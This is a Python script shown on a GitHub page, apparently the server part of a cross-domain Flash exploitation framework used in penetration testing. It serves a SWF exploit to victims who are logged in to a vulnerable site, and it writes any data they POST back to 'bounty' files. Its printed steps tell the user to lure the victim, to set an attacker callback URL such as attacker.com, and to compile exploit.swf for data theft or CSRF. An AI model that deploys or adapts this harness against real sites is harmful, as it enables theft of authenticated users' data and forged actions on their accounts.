forked from sethsec/crossdomain-exploitation-framework
-
Notifications
You must be signed in to change notification settings - Fork 0
/
SWF-server
executable file
·227 lines (192 loc) · 8.89 KB
/
SWF-server
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
#!/usr/bin/python
######################################################################
# Author: Seth Art (sethsec@gmail.com, @sethsec) #
# Version: 0.9.3 #
# Date: 10.13.2014 #
# Purpose: Very basic web server that answers GET and POST requests #
# The server is designed to serve an html and swf file to #
# a victim, and will save any data that comes via POST body #
# to a file on disk. #
# #
######################################################################
import ssl
import time
import BaseHTTPServer
import cgi
from urlparse import parse_qsl
from BaseHTTPServer import BaseHTTPRequestHandler
import os, sys
import urllib2
from hashlib import sha512
import zipfile
import subprocess
PORT_NUMBER = 443 # Change this if you are already running an SSL server on port 443
VERSION = "0.9.3"
class MyHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_GET(s):
"""Respond to a GET request."""
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
spath = s.path.lstrip('/')
if spath == '':
spath = 'index.html'
try:
with open (spath, 'r') as file:
s.wfile.writelines(file)
except:
print "[ERROR] %s does not exist" % spath
def do_POST(s):
"""Save data from ANY POST request to a file on disk"""
length = int(s.headers['content-length'])
postvars = parse_qsl(s.rfile.read(length), keep_blank_values=1)
clientIP = s.client_address[0]
timestamp = time.time()
filename = 'bounty-%s-%s.txt' % (clientIP,timestamp)
with open('../bounty/%s' % filename, 'w') as txt:
txt.writelines(postvars[0])
print
print "* New bounty file written to disk: "
print "* %s/bounty/%s " % (run_path,filename)
print
s.send_response(200)
s.send_header("Content-type", "text/html")
s.end_headers()
def start_server(run_path):
server_class = BaseHTTPServer.HTTPServer
os.chdir('%s/webroot' % run_path)
httpd = server_class(('', PORT_NUMBER), MyHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='%s/server.pem' % run_path, server_side=True)
print
print
print " [SWF-Server] Listening on %s/tcp" % (PORT_NUMBER)
print " [SWF-Server] Document Root: %s" % (os.getcwd())
print " [SWF-Server] Version: %s" % (VERSION)
print " [SWF-Server] Use <Ctrl-C> to stop"
print
print
print " Step #1) Hope that your victim is authenticated with the vulnerable site"
print " Step #2) Convince your victim to arrive at https://<this-server>/index.html"
print " Step #3) Collect your bounty at ./bounty/"
print
print
try:
httpd.serve_forever()
except KeyboardInterrupt:
pass
httpd.server_close()
print time.asctime(), "Server Stopped"
def download_flex():
# From: http://blog.radevic.com/2012/07/python-download-url-to-file-with.html
# Improve http://stackoverflow.com/a/22776/286994
# (using .format() instead of % string formatting)
url = "http://download.macromedia.com/pub/flex/sdk/flex_sdk_4.6.zip"
file_name = url.split('/')[-1]
u = urllib2.urlopen(url)
f = open(file_name, 'wb')
meta = u.info()
file_size = int(meta.getheaders("Content-Length")[0])
print("[INSTALL] Downloading: {0} Bytes: {1}".format(url, file_size))
file_size_dl = 0
block_sz = 8192
while True:
buffer = u.read(block_sz)
if not buffer:
break
file_size_dl += len(buffer)
f.write(buffer)
p = float(file_size_dl) / file_size
status = r"{0} [{1:.2%}]".format(file_size_dl, p)
status = status + chr(8)*(len(status)+1)
sys.stdout.write(status)
f.close()
flex_checksum = sha512(open("/opt/flex/flex_sdk_4.6.zip", 'rb').read()).hexdigest()
if flex_checksum == "e553553c2a536b31400c444b84a697e337f33eded344ffaaa8b8978a237e5a77f358f850073003b4bfd519e5947a5a1ca1c87324336b922d4ccda7cd94889737":
print "[INSTALL] Extracting Flex to /opt/flex (Takes 5-20 seconds)"
time.sleep(2)
os.system("unzip -o /opt/flex/flex_sdk_4.6.zip >/dev/null")
os.system("chmod -R a+rx /opt/flex/")
#os.system("'export PATH=/opt/flex/bin:$PATH' >> ~/.bashrc")
os.system("chmod 755 bin/mxmlc")
else:
CK_SM_CONT = raw_input("[INSTALL] Invalid checksum for flex_sdk_4.6.zip download. Are you sure you want to continue? (y/n)")
if CK_SM_CONT == "y":
os.system("unzip -o /opt/flex/flex_sdk_4.6.zip >/dev/null")
os.system("chmod -R a+rx /opt/flex/")
#os.system("'export PATH=/opt/flex/bin:$PATH' >> ~/.bashrc")
os.system("chmod 755 bin/mxmlc")
else:
exit
def print_instructions():
print ""
print " To create your own SWF file:"
print ""
print " 1) Chose a template from ./actionscript-templates"
print " 2) Edit the template (or copy and then edit the template)"
print " a) Specify a page on the vulnerable site that you want your victimn to access:"
print " Ex: http://vulnerable.com/account/settings"
print " b) For data stealing SWFs, specify your attacker callback URL:"
print " Ex: http://attacker/, https://192.168.0.100, or https://www.attacker.com/"
print " c) For CSRF SWFs, modify the actionscript to extract the information you need"
print " 3) Compile the ActionScript file and drop the SWF to the ./webroot directory (exploit.swf)"
print " a) /opt/flex/bin/mxmlc ./actionscript-templates/<template>.as --output ./webroot/exploit.swf"
print ""
print " 4) Re-run ./SWF-server"
print ""
if __name__ == '__main__':
print ""
print "**************************************************"
print "* *"
print "* Welcome to SWF Server! *"
print "* *"
print "**************************************************"
print ""
downloaded = ''
run_path = os.getcwd()
if not os.path.isdir("/opt/flex"):
print "It looks like this is the first run. We need to set up a few things first."
print ""
print "[INSTALL] Creating /opt/flex..."
time.sleep(2)
os.makedirs("/opt/flex")
os.chdir("/opt/flex")
if not os.path.isfile("/opt/flex/flex_sdk_4.6.zip"):
print "[INSTALL] Downloading Flex (This is a 340MB file)..."
download_flex()
downloaded = "True"
else:
flex_checksum = sha512(open("/opt/flex/flex_sdk_4.6.zip", 'rb').read()).hexdigest()
if not flex_checksum == "e553553c2a536b31400c444b84a697e337f33eded344ffaaa8b8978a237e5a77f358f850073003b4bfd519e5947a5a1ca1c87324336b922d4ccda7cd94889737":
print "[INSTALL] Flex file exists, but the file checksum does not match. Downloading again..."
download_flex()
downloaded = "True"
if not os.path.isfile("%s/server.pem" % run_path):
print "[INSTALL] Creating a self-signed SSL cert..."
time.sleep(2)
os.system('openssl req -new -x509 -keyout %s/server.pem -out %s/server.pem -days 365 -nodes -subj "/C=US" >/dev/null 2>&1' % (run_path, run_path))
print "[INSTALL] Key and Cert saved in %s/server.pem" % run_path
if os.path.isdir("/usr/share/nmap/scripts"):
if not os.path.isfile("/usr/share/nmap/scripts/http-crossdomain.nse"):
print "[INSTALL] Copying http-crossdomain.nse to nmap scripts directory..."
time.sleep(2)
os.system("cp %s/http-crossdomain.nse /usr/share/nmap/scripts/" % run_path)
elif os.path.isdir("/usr/local/share/nmap/scripts"):
if not os.path.isfile("/usr/local/share/nmap/scripts/http-crossdomain.nse"):
print "[INSTALL] Copying http-crossdomain.nse to nmap scripts directory..."
time.sleep(2)
os.system("cp %s/http-crossdomain.nse /usr/local/share/nmap/scripts/" % run_path)
webroot_contents = os.listdir("%s/webroot/" % run_path)
swf_found = "False"
for item in webroot_contents:
if item.endswith('.swf') or item.endswith('.SWF'):
swf_found = "True"
break
if swf_found == "True":
start_server(run_path)
else:
if downloaded == "True":
print "[INSTALL] Installation complete. Compile SWF and then start SWF-server again"
print_instructions()
else:
print "[WARN] - You do not have any SWF files in the web root yet. "
print_instructions()